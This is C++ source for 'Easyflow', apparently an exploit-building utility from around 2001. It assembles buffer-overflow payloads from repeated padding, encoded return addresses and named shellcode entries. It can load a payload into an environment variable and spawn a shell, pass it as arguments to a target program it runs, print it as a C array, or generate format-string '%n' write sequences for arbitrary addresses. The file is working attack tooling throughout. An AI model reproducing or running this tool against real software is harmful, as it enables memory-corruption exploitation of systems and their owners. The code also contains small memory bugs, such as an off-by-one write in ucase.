/***********************************************************************/
/*  Easyflow is (C) 1999-2001 lamagra.seKure.de  This program is free  */
/*  software; you can redistribute it and/or modify it under the terms */
/*  of the GNU General Public License as published by the Free Software*/
/*  Foundation; Version 2.  This guarantees your right to use, modify, */
/*  and redistribute this software under certain conditions.           */
/*                                                                     */
/*  If you received these files with a written license agreement       */
/*  stating terms other than the (GPL) terms above, then that          */
/*  alternative license agreement takes precendence over this comment. */
/*                                                                     */
/*  Source is provided to this software because we believe users have  */
/*  a right to know exactly what a program is going to do before they  */
/*  run it.  This also allows you to audit the software for security   */
/*  holes (none have been found so far).                               */
/*                                                                     */
/*  This program is distributed in the hope that it will be useful,    */
/*  but WITHOUT ANY WARRANTY; without even the implied warranty of     */
/*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU  */
/*  General Public License for more details (                          */
/*  http://www.gnu.org/copyleft/gpl.html ).                            */
/*                                                                     */
/***********************************************************************/

#include <ctype.h>
#include <stdlib.h>
#include <getopt.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <iostream.h>
#include "lstring.hpp"
#include "shellcode.hpp"
#include "help.hpp"

lstring parse(char *);
char *hexnibbles(char *,int);
char *construct_fb(unsigned long, int, int);
void format(char *);
int Calculate(char *, unsigned long *);

void list_shellcode()
{
    int x;
    char *str;
    
    cout << "List of shellcodes: " << endl;

    for(x = 0;sc[x].name;x++)
    {
        str = (sc[x].comma_handler)?" (,)":"";
        cout << '\t' << sc[x].name << '(' << sc[x].len << ')' << ": " << sc[x].help << str << endl;
    }
    cout << "(*): needs to be combined with other shellcode" << endl
         << "(,): has a special comma handler" << endl;
    exit(0);
}

void calculator()
{
    unsigned long ret;
    char buf[2048];

    while(1)
    {
        ret = 0;
        memset(buf,0, 2048);
        
        cout << "expression: ";
        cout.flush();
        
        if(read(0,buf,sizeof(buf)) < 1)
            break;
            
        Calculate(buf, &ret);
        cout << "Result: " << ret << endl;
    }
    cout << endl;
}

char *ucase(char *string)
{
    static char *upper = 0;
    int n = strlen(string);

    if(upper)
        free(upper);

    if((upper = new char[n]) == 0)
    {
        cerr << "Malloc: not enough memory" << endl;
        exit(-1);
    }

    do{ upper[n] = toupper(string[n]); }while(n--);

    return upper;
}

#define COLUMNS 16
char hexlist[]="0123456789abcdef";

/* Nice code from NuuB */
void generate_c_code(char *name,int num, lstring &buffer)
{
  int row, col;
  char *array = buffer.ptr();

  row = col = 0;
  printf("#define %s%dSIZE %d\nchar %s%d[]=\n\t\"",
         ucase(name), num, buffer.size(), name, num);
         
  while(row * COLUMNS + col < buffer.size())
  {
    if(!col && row)
      printf("\"\n\t\"");

    printf("\\x%c%c",
           hexlist[(array[(row * COLUMNS + col)] >> 4) & 0x0f],
           hexlist[array[(row * COLUMNS + col)] & 0x0f]);
           
    if(++col == COLUMNS)
      row++, col = 0;
  }
  printf("\";\n\n");
}
/* end */

int telnet_escape = 0;

int main(int argc,char **argv)
{
    int i, ch, num;
    int nflag = 0;
    extern int optind;
    extern char *optarg;
    char *envar = 0,
         *after = 0, 
         *ccode = 0;
    char *nargv[255];
    lstring ret;

    memset((char *)nargv,0,255 * sizeof(char *));
    
    if(argc < 2)
        usage(argv[0]);

    while((ch = getopt(argc,argv,"hw:e:d:nf:la:sctg:")) != EOF)
        switch(ch)
        {
            case 'w':
                switch(optarg[0])
                {
                    case 's':
                        format_help();
                        break;
                        
                    case 'c': 
                        calc_help();
                        break;

                    default:
                        usage(argv[0]);
                }
                break;
                    
            case 'e':
                if(ccode || nargv[0]) 
                    cout << "Generator or argexec already set, ignoring envar" << endl;
                else 
                    envar = optarg;
                break;
                
            case 'd':
                if(ccode || envar) 
                    cout << "Generator or envar already set, ignoring argexec" << endl;
                else 
                    nargv[0] = optarg;
                break;

            case 'g':
                if(nargv[0] || envar) 
                    cout << "Argexec or envar already set, ignoring generator" << endl;
                else 
                    ccode = optarg;
                break;
                
            case 'n':
                nflag = true;
                break;
                
            case 'f':
                format(optarg);
                exit(0);

            case 'l':
                list_shellcode();
                break;

            case 'a':
                after = optarg;
                break;

            case 't':
                telnet_escape = true;
                break;

            case 'c':
                calculator();
                break;

            case '?': // Missing argument (broken libc)
            case ':': // Missing argument
                return -1;

            default: // includes 'h'    
                usage(argv[0]);
        }

    if(envar)
        num = strlen(envar);
        
    for(i = optind;i < argc; i++)
    {
        ret = parse(argv[i]);

        if(nflag)
            ret << '\n';

        if(ccode)
            generate_c_code(ccode, i - optind, ret);
        else if(envar)
        {
            envar[num] = (i - optind + 48);
            envar[num+1] = 0;
            cout << "setting " << envar << endl;
            setenv(envar,ret.ptr(),1);
        }
        else if(nargv[0])
        {
            if(i - optind + 1 > 254)
            {
                cerr << "too many arguments" << endl;
                return -1;
            }
        
            if((nargv[i - optind + 1] = new char[ret.size()]) == 0)
            {
                cerr << "Not enough memory to continue" << endl;
                return -1;
            }
            memcpy(nargv[i - optind + 1],ret.ptr(),ret.size());
        }
        else
        {
            cout << ret.ptr();
            cout.flush();
        }
        ret.clear();
    }

    if(envar)
    {
        setenv("PS1","\\u@easyflow> ",1);
        execl("/bin/sh","sh",0);
    }else if(nargv[0])
    {
        execvp(nargv[0],nargv);
        perror(nargv[0]);
    }else if(after)
    {
        execlp(after,after,0);
        perror(after);
    }    
    return 0;
}

char *endpos;

lstring parse(char *string)
{
    lstring buffer, ret;
    char *p, *comma;
    int i;
    unsigned long x;

    while(1)
    {
        switch(*string)
        {
            case ']':
            case '\0':
                endpos = string;
                buffer << '\0';
                return buffer;

            case '\\':
                switch(*++string)
                {
                    case 'n':
                        buffer << '\n';
                        break;
                        
                    case 'r':
                        buffer << '\r';
                        break;
                        
                    case 't':
                        buffer << '\t';
                        break;
                        
                    case 'a':
                        buffer << '\a';
                        break;

                    case 's':
                        cout << buffer.ptr();
                        cout.flush();

                        buffer = '\0';
                        sleep(1);
                        break;
                        
                    case 'x': // hex char
                        if(*(++string) == 'f' && *(string + 1) == 'f' && telnet_escape)
                            buffer << '\xff'; /* an extra 0xff */
                        
                        buffer += hexnibbles(string,2);
                        string++;
                        break;
                    
                    case 'l': // little endian address
                        buffer += hexnibbles(++string,8);
                        string += 7;
                        break;
                    
                    case 'L': // big endian address
                        buffer += hexnibbles(++string,-8);
                        string += 7;
                        break;

                    case '\\':
                        buffer << '\\';
                        break;

                    // more to come
                }
                break;
            
            case '[':
                if(!(p = strchr(string++,',')))
                {
                    cout << "parse error after " << string << endl;
                    exit(-1);
                }   
                else
                {
                    *p++ = 0; // erase the comma
                    Calculate(string,&x);
                    ret = parse(p);

                    for(;x > 0;x--)
                        buffer += ret;
                    string = endpos;
                }
                break;

            case '{':
                if(!(p = strchr(string++,'}')))
                {
                    cout << "parse error after " << string << endl;
                    exit(-1);
                }   
                else
                {
                    *p = 0;
                    if(string[0] != 'L' && string[0] != 'l')
                        Calculate(string,&x);
                    else
                        Calculate(string + 1,&x);
                        
                    if(string[0] == 'L')
                        for(i = 3 ; i >= 0 ; i--)
                            buffer << ((char *)&x)[i]; 
                    else
                        for(i = 0 ; i < 4 ; i++)
                            buffer << ((char *)&x)[i]; 
                            
                        
                    string = p;
                }
                break;

            case '<':
                if(!(p = strchr(string++,'>')))
                {
                    cout << "parse error after " << string << endl;
                    exit(-1);
                }   
                else
                {
                    comma = 0;
                    if((comma = strchr(string,',')))
                        *comma++ = 0;

                    *p = 0;
                    for(x = 0;sc[x].name;x++)
                    {
                        if(!strcmp(sc[x].name,string))
                        {
                            if(comma && sc[x].comma_handler)
                                sc[x].comma_handler(comma);

                            buffer += sc[x].code;
                            break;
                        }
                    }
                    if(!sc[x].name)
                    {
                        cout << "shellcode " << string << " not found" << endl;
                        exit(-1);
                    }
                }
                string = p;
                break;

            default:
                buffer << *string;
        }
        string++;
    }
}

char *hexnibbles(char *string, int size)
{
    int flag = 0;
    char *p, *o, c;
    static char buf[32];

    if(size < 0)
    {
        flag = 1;
        size *= -1;
    }

    if(!flag){ o = buf + (size / 2); *o-- = 0; } else { o = buf; }

    for(p = string;size;size-=2,p++)
    {
        c = (*p >= 'A')? ((*p >= 'a')?(*p - 'a' + 10):(*p - 'A' + 10)) : (*p - '0');
        c <<= 4;
        c += (*++p >= 'A')? ((*p >= 'a')?(*p - 'a' + 10):(*p - 'A' + 10)) : (*p - '0');
        *o = c;
        (!flag)?(o--):(o++);
    }

    if(flag)
        *o = 0;

    return buf;
}

int sizeof_sc(char *token)
{
        int x;
        for(x = 0;sc[x].name;x++)
        {
            if(!strcmp(sc[x].name,token))
            {
                return sc[x].len;
                break;
            }
        }
        if(!sc[x].name)
        {
            cout << "shellcode " << token << " not found" << endl;
            exit(-1);
        }
        
        return 0; /* never reached */
}       

void format(char *arg)
{
    char *p;
    unsigned long addr;

    if(!(p = strchr(arg,',')))
    {
        cout << "parse error after " << arg << endl;
        exit(-1);
    }   
    else
    {
        *p++ = 0;
        addr = strtoul(arg,0,0);
        if(!(arg = strchr(p,',')))
        {
            cout << "parse error after " << p << endl;
            exit(-1);
        }   
        else
        {
            *arg++ = 0;
            cout << construct_fb(addr,atoi(p),atoi(arg)) << endl;
        }
    }
}

char *construct_fb(unsigned long addy, int cnt, int num)
{
    static char buf[200];
    long pad, left;
    int increase, sub, i;
    char *ptr = buf;

    switch(num)
    {
        case 1: 
            increase = 0x10000000;
            sub      = 0xffffffff;
            break;

        case 2:
            increase = 0x10000000 >> 16;
            sub      = 0xffffffff >> 16;
            break;
            
        case 4:
            increase = 0x10000000 >> 20;
            sub      = 0xffffffff >> 24;
            break;

        default:
            cout << "Illegal number" << num << endl;
            exit(-1);
    }

    for(i = 0; i < num; i ++)
    {
       pad = addy >> i * (32 / num) & sub;
       
       while(pad < cnt) 
        pad += increase;
        
       left = pad - cnt;
       ptr += sprintf(ptr,"%%%lux%%n", left);
       cnt += left;
    }
    return buf;
}    
